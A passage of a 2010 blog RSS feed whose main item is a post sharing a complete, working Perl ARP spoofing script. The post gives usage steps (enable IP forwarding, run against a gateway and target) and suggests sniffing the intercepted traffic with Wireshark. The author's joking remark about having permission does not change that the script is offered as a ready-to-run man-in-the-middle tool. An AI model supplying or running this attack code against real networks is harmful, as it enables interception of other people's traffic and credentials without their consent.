href="http://www.myspace.com/Modules/PostTo/Pages/?l=3&amp;u=http://www.nazrek.org/index.php/2010/07/29/abschiedspost/&amp;t=Abschiedspost" title="Post to MySpace"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-myspace-micro4.png" alt="Post to MySpace" /></a> <a target="_blank" class="tt" href="http://ping.fm/ref/?method=microblog&amp;title=Abschiedspost&amp;link=http://www.nazrek.org/index.php/2010/07/29/abschiedspost/" title="Post to Ping.fm"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-ping-micro3.png" alt="Post to Ping.fm" /></a> <a target="_blank" class="tt" href="http://reddit.com/submit?url=http://www.nazrek.org/index.php/2010/07/29/abschiedspost/&amp;title=Abschiedspost" title="Post to Reddit"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-reddit-micro4.png" alt="Post to Reddit" /></a> <a target="_blank" class="tt" href="http://stumbleupon.com/submit?url=http://www.nazrek.org/index.php/2010/07/29/abschiedspost/&amp;title=Abschiedspost" title="Post to StumbleUpon"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-su-micro3.png" alt="Post to StumbleUpon" /></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.nazrek.org/index.php/2010/07/29/abschiedspost/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>[Perl] ARP Spoofing / Poisoning Script</title>
		<link>http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/</link>
		<comments>http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/#comments</comments>
		<pubDate>Tue, 13 Jul 2010 22:34:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Sources]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Virtual-life]]></category>
		<category><![CDATA[arp]]></category>
		<category><![CDATA[eth]]></category>
		<category><![CDATA[ethernet]]></category>
		<category><![CDATA[packets]]></category>
		<category><![CDATA[poison]]></category>
		<category><![CDATA[poisoning]]></category>
		<category><![CDATA[sniff]]></category>
		<category><![CDATA[sniffing]]></category>
		<category><![CDATA[spoof]]></category>
		<category><![CDATA[spoofing]]></category>

		<guid isPermaLink="false">http://www.nazrek.org/?p=910</guid>
		<description><![CDATA[Here we go, lol. I just remembered that I wanted to create a rather simple script to poison ARP caches&#8230;.some time ago. As the headline already tells: It&#8217;s written in Perl (and it&#8217;ll just run under linux :F). As mentioned I tried to keep it rather simple &#8211; but there are only a few comments. [...]]]></description>
			<content:encoded><![CDATA[<p>Here we go, lol.<br />
I just remembered that I wanted to create a rather simple script to poison ARP caches&#8230;.some time ago.<br />
As the headline already tells: It&#8217;s written in Perl (and it&#8217;ll just run under linux :F).<br />
As mentioned I tried to keep it rather simple &#8211; but there are only a few comments.<br />
If you have any questions, feel free to ask.</p>
<p>Useful links:<br />
<a href="http://en.wikipedia.org/wiki/ARP_spoofing">http://en.wikipedia.org/wiki/ARP_spoofing</a><br />
<a href="http://en.wikipedia.org/wiki/Ethernet">http://en.wikipedia.org/wiki/Ethernet</a><br />
<a href="http://en.wikipedia.org/wiki/Address_Resolution_Protocol">http://en.wikipedia.org/wiki/Address_Resolution_Protocol</a></p>
<p>The Usage is simple, too.<br />
First enable the forwarding of packets your computer receives.</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="perl" style="font-family:monospace;">echo <span style="color: #ff0000;">&quot;1&quot;</span> <span style="color: #339933;">&gt;&gt;</span> <span style="color: #339933;">/</span>proc<span style="color: #339933;">/</span>sys<span style="color: #339933;">/</span>net<span style="color: #339933;">/</span>ipv4<span style="color: #339933;">/</span>ip_forward</pre></td></tr></table></div>

<p>Then just run the script with the IPs of two <del>victims</del> local computers.<br />
Of course you&#8217;ll need to permission to poison their ARP Cache. <img src='http://www.nazrek.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="perl" style="font-family:monospace;"><span style="color: #339933;">./</span>arpsp<span style="color: #339933;">.</span>pl <span style="color: #009999;">&lt;gateway&gt;</span> <span style="color: #009999;">&lt;target&gt;</span></pre></td></tr></table></div>

<p>As long as the script&#8217;s running, the computers&#8217; caches keep being poisoned.<br />
To sniff the traffic, you&#8217;ll still need another tool. Wireshark or something..</p>
<p>Anyway, here&#8217;s the code:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
</pre></td><td class="code"><pre class="perl" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/usr/bin/perl</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">use</span> Socket<span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">use</span> warnings<span style="color: #339933;">;</span>
<span style="color: #000066;">no</span> warnings <span style="color: #ff0000;">'uninitialized'</span><span style="color: #339933;">;</span>
<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$device</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'eth0'</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #000066;">print</span> <span style="color: #ff0000;">'	*~=~ arpsp.pl // [PHCN]nazrek'</span><span style="color: #339933;">.</span><span style="color: #ff0000;">&quot;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span> 
	<span style="color: #000066;">print</span> <span style="color: #ff0000;">'	*~=~ Mail/Jabber // &lt;nazrek@phcn.ws&gt;'</span><span style="color: #339933;">.</span><span style="color: #ff0000;">&quot;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
	<span style="color: #000066;">print</span> <span style="color: #ff0000;">'	*~=~ 2010 // http://www.nazrek.org/'</span><span style="color: #339933;">.</span><span style="color: #ff0000;">&quot;<span style="color: #000099; font-weight: bold;">\n</span><span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#Get input</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$gw_IP</span> <span style="color: #339933;">=</span> <span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$targ_IP</span> <span style="color: #339933;">=</span> <span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#Check input</span>
	<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$gw_IP</span> <span style="color: #339933;">.</span> <span style="color: #ff0000;">&quot;.&quot;</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">$targ_IP</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">!~</span> <span style="color: #009966; font-style: italic;">/^([0-9]{1,3}\.){7}[0-9]{1,3}$/</span><span style="color: #009900;">&#41;</span>
	<span style="color: #009900;">&#123;</span> <span style="color: #000066;">die</span><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;	Usage: arpsp.pl &lt;gateway&gt; &lt;target&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#Get 'em into the ARP Cache</span>
	<span style="color: #000066;">system</span><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;ping -q -c 1 -w 2 $gw_IP &gt; /dev/null&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #000066;">system</span><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;ping -q -c 1 -w 2 $targ_IP &gt; /dev/null&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$gw_MAC</span> <span style="color: #339933;">=</span> get_MAC<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$gw_IP</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$targ_MAC</span> <span style="color: #339933;">=</span> get_MAC<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$targ_IP</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>	
&nbsp;
	<span style="color: #666666; font-style: italic;">#Read own IP / MAC from *ifconfig*</span>
	<span style="color: #0000ff;">@ifconf</span> <span style="color: #339933;">=</span> <span style="color: #000066;">split</span><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot; &quot;</span><span style="color: #339933;">,</span> <span style="color: #000066;">qx</span><span style="color: #009900;">&#91;</span><span style="color: #339933;">/</span>sbin<span style="color: #339933;">/</span>ifconfig <span style="color: #0000ff;">$device</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$own_IP</span> <span style="color: #339933;">=</span> <span style="color: #000066;">substr</span><span style="color: #009900;">&#40;</span> <span style="color: #0000ff;">$ifconf</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">7</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">,</span> <span style="color: #000066;">index</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$ifconf</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">7</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;:&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">+</span><span style="color: #cc66cc;">1</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$own_MAC</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">$ifconf</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">5</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#Print summary</span>
	<span style="color: #000066;">print</span> <span style="color: #ff0000;">&quot;	*~=~ Gateway -&gt; $gw_IP	-&gt; $gw_MAC<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
	<span style="color: #000066;">print</span> <span style="color: #ff0000;">&quot;	*~=~ Target  -&gt; $targ_IP	-&gt; $targ_MAC<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
	<span style="color: #000066;">print</span> <span style="color: #ff0000;">&quot;	*~=~ You     -&gt; $own_IP	-&gt; $own_MAC<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#Create the socket</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$socket</span><span style="color: #339933;">;</span>
	<span style="color: #0000ff;">$socket</span> <span style="color: #339933;">=</span> <span style="color: #000066;">socket</span><span style="color: #009900;">&#40;</span>SOCKET<span style="color: #339933;">,</span> PF_INET<span style="color: #339933;">,</span> <span style="color: #cc66cc;">10</span><span style="color: #339933;">,</span> 0x300<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>	
	<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span><span style="color: #0000ff;">$socket</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
		<span style="color: #000066;">print</span> <span style="color: #ff0000;">&quot;$!<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
		<span style="color: #000066;">exit</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">-</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #009900;">&#125;</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#Generate packets and send 'em</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$dest</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span>x2<span style="color: #009900;">&#41;</span><span style="color: #339933;">.</span><span style="color: #0000ff;">$device</span><span style="color: #339933;">.</span><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span>x<span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">14</span><span style="color: #339933;">-</span><span style="color: #000066;">length</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$device</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #b1b100;">while</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
	<span style="color: #666666; font-style: italic;">#Create the socket</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$socket</span><span style="color: #339933;">;</span>
	<span style="color: #0000ff;">$socket</span> <span style="color: #339933;">=</span> <span style="color: #000066;">socket</span><span style="color: #009900;">&#40;</span>SOCKET<span style="color: #339933;">,</span> PF_INET<span style="color: #339933;">,</span> <span style="color: #cc66cc;">10</span><span style="color: #339933;">,</span> 0x300<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>	
	<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">!</span><span style="color: #0000ff;">$socket</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
		<span style="color: #000066;">print</span> <span style="color: #ff0000;">&quot;$!<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
		<span style="color: #000066;">exit</span><span style="color: #009900;">&#40;</span><span style="color: #339933;">-</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #009900;">&#125;</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$pkt1</span> <span style="color: #339933;">=</span> gen_PKT<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$own_MAC</span><span style="color: #339933;">,</span><span style="color: #0000ff;">$gw_IP</span><span style="color: #339933;">,</span><span style="color: #0000ff;">$targ_MAC</span><span style="color: #339933;">,</span><span style="color: #0000ff;">$targ_IP</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$pkt2</span> <span style="color: #339933;">=</span> gen_PKT<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$own_MAC</span><span style="color: #339933;">,</span><span style="color: #0000ff;">$targ_IP</span><span style="color: #339933;">,</span><span style="color: #0000ff;">$gw_MAC</span><span style="color: #339933;">,</span><span style="color: #0000ff;">$gw_IP</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #000066;">send</span><span style="color: #009900;">&#40;</span>SOCKET<span style="color: #339933;">,</span><span style="color: #0000ff;">$pkt1</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">,</span><span style="color: #0000ff;">$dest</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #000066;">send</span><span style="color: #009900;">&#40;</span>SOCKET<span style="color: #339933;">,</span><span style="color: #0000ff;">$pkt2</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">,</span><span style="color: #0000ff;">$dest</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#finally close the socket :)</span>
	<span style="color: #000066;">close</span><span style="color: #009900;">&#40;</span>SOCKET<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #000066;">print</span> <span style="color: #ff0000;">&quot;sent<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span>
	<span style="color: #000066;">sleep</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">4</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #009900;">&#125;</span>
&nbsp;
&nbsp;
<span style="color: #666666; font-style: italic;">####################################################</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#Read MAC-Adress from the ARP Cache</span>
	<span style="color: #000000; font-weight: bold;">sub</span> get_MAC <span style="color: #009900;">&#123;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$IP</span> <span style="color: #339933;">=</span> <span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$MAC</span> <span style="color: #339933;">=</span> <span style="color: #000066;">qx</span><span style="color: #009900;">&#91;</span>arp <span style="color: #339933;">-</span>na <span style="color: #0000ff;">$IP</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
		<span style="color: #0000ff;">$MAC</span> <span style="color: #339933;">=</span> <span style="color: #000066;">substr</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$MAC</span><span style="color: #339933;">,</span> <span style="color: #000066;">index</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$MAC</span><span style="color: #339933;">,</span> <span style="color: #ff0000;">':'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">-</span><span style="color: #cc66cc;">2</span><span style="color: #339933;">,</span> <span style="color: #cc66cc;">17</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
		<span style="color: #000066;">return</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$MAC</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #666666; font-style: italic;">####################################################</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#Generate the ETH Packet	</span>
	<span style="color: #000000; font-weight: bold;">sub</span> gen_PKT <span style="color: #009900;">&#123;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$eth</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$s_h_addr</span><span style="color: #339933;">=</span><span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$s_p_addr</span><span style="color: #339933;">=</span><span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$d_h_addr</span><span style="color: #339933;">=</span><span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$d_p_addr</span><span style="color: #339933;">=</span><span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
    		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$eth_type</span> <span style="color: #339933;">=</span> 0x0806<span style="color: #339933;">;</span>
&nbsp;
    		<span style="color: #0000ff;">$d_h_addr</span><span style="color: #339933;">=~</span><span style="color: #000066;">s</span><span style="color: #339933;">/</span>\<span style="color: #339933;">://</span>g<span style="color: #339933;">;</span>
    		<span style="color: #0000ff;">$s_h_addr</span><span style="color: #339933;">=~</span><span style="color: #000066;">s</span><span style="color: #339933;">/</span>\<span style="color: #339933;">://</span>g<span style="color: #339933;">;</span>
    		<span style="color: #0000ff;">$arp</span><span style="color: #339933;">=</span><span style="color: #009900;">&#40;</span> gen_ARP<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$s_h_addr</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$s_p_addr</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$d_h_addr</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$d_p_addr</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
    		<span style="color: #0000ff;">$eth</span><span style="color: #339933;">=</span><span style="color: #000066;">pack</span><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">'H*H*na*'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$d_h_addr</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$s_h_addr</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$eth_type</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$arp</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
    		<span style="color: #000066;">return</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$eth</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #666666; font-style: italic;">####################################################</span>
&nbsp;
	<span style="color: #666666; font-style: italic;">#Generate the ARP Reply</span>
	<span style="color: #666666; font-style: italic;">#It's a reply and we wanna trick the target and the gateway(or another target - doesn't matter)</span>
	<span style="color: #666666; font-style: italic;">#Soo...</span>
	<span style="color: #666666; font-style: italic;">#Source Hardware Address 	($s_h_addr) 	-&gt;	Our MAC</span>
	<span style="color: #666666; font-style: italic;">#Source Protocol Address 	($s_p_addr) 	-&gt;	Target's  / Gateway's IP</span>
	<span style="color: #666666; font-style: italic;">#Destination Hardware Address	($d_h_addr) 	-&gt; 	Gateway's / Target's MAC</span>
	<span style="color: #666666; font-style: italic;">#Destination Protocol Address ($d_p_addr)		-&gt;	Gateway's / Target's IP</span>
	<span style="color: #000000; font-weight: bold;">sub</span> gen_ARP <span style="color: #009900;">&#123;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$arp</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$h_type</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$p_type</span><span style="color: #339933;">=</span>0x800<span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$h_len</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">6</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$p_len</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">4</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$opcode</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">2</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$s_h_addr</span><span style="color: #339933;">=</span><span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$s_p_addr</span><span style="color: #339933;">=</span><span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$d_h_addr</span><span style="color: #339933;">=</span><span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
		<span style="color: #b1b100;">my</span> <span style="color: #0000ff;">$d_p_addr</span><span style="color: #339933;">=</span><span style="color: #000066;">shift</span><span style="color: #339933;">;</span>
		<span style="color: #0000ff;">$s_p_addr</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#40;</span><span style="color: #000066;">gethostbyname</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$s_p_addr</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">4</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
		<span style="color: #0000ff;">$d_p_addr</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#40;</span><span style="color: #000066;">gethostbyname</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$d_p_addr</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">4</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
		<span style="color: #0000ff;">$arp</span><span style="color: #339933;">=</span><span style="color: #000066;">pack</span><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">'nnccnH*a4H*a4'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$h_type</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$p_type</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$h_len</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$p_len</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$opcode</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$s_h_addr</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$s_p_addr</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$d_h_addr</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">$d_p_addr</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
		<span style="color: #000066;">return</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">$arp</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #009900;">&#125;</span>
<span style="color: #666666; font-style: italic;">#EOF</span></pre></td></tr></table></div>

<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script+http://bit.ly/a2mVmw+@nazrek" title="Post to Twitter"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-twitter-micro4.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://plurk.com/?status=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script+http://bit.ly/a2mVmw" title="Post to Plurk"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-plurk-micro3.png" alt="Post to Plurk" /></a> <a target="_blank" class="tt" href="http://buzz.yahoo.com/submit?submitUrl=http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/&amp;submitHeadline=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script" title="Post to Yahoo Buzz"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-buzz-micro4.png" alt="Post to Yahoo Buzz" /></a> <a target="_blank" class="tt" href="http://delicious.com/post?url=http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/&amp;title=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script" title="Post to Delicious"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-delicious-micro3.png" alt="Post to Delicious" /></a> <a target="_blank" class="tt" href="http://digg.com/submit?url=http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/&amp;title=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script" title="Post to Digg"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-digg-micro4.png" alt="Post to Digg" /></a> <a target="_blank" class="tt" href="http://www.facebook.com/share.php?u=http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/&amp;t=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script" title="Post to Facebook"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-facebook-micro3.png" alt="Post to Facebook" /></a> <a target="_blank" class="tt" href="http://www.myspace.com/Modules/PostTo/Pages/?l=3&amp;u=http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/&amp;t=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script" title="Post to MySpace"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-myspace-micro4.png" alt="Post to MySpace" /></a> <a target="_blank" class="tt" href="http://ping.fm/ref/?method=microblog&amp;title=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script&amp;link=http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/" title="Post to Ping.fm"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-ping-micro3.png" alt="Post to Ping.fm" /></a> <a target="_blank" class="tt" href="http://reddit.com/submit?url=http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/&amp;title=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script" title="Post to Reddit"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-reddit-micro4.png" alt="Post to Reddit" /></a> <a target="_blank" class="tt" href="http://stumbleupon.com/submit?url=http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/&amp;title=%5BPerl%5D+ARP+Spoofing+%2F+Poisoning+Script" title="Post to StumbleUpon"><img class="nothumb" src="http://www.nazrek.org/wp-content/plugins/tweet-this/icons/tt-su-micro3.png" alt="Post to StumbleUpon" /></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.nazrek.org/index.php/2010/07/14/perl-arp-spoofing-poisoning-script/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Switching to english</title>
		<link>http://www.nazrek.org/index.php/2010/07/12/switching-to-english/</link>
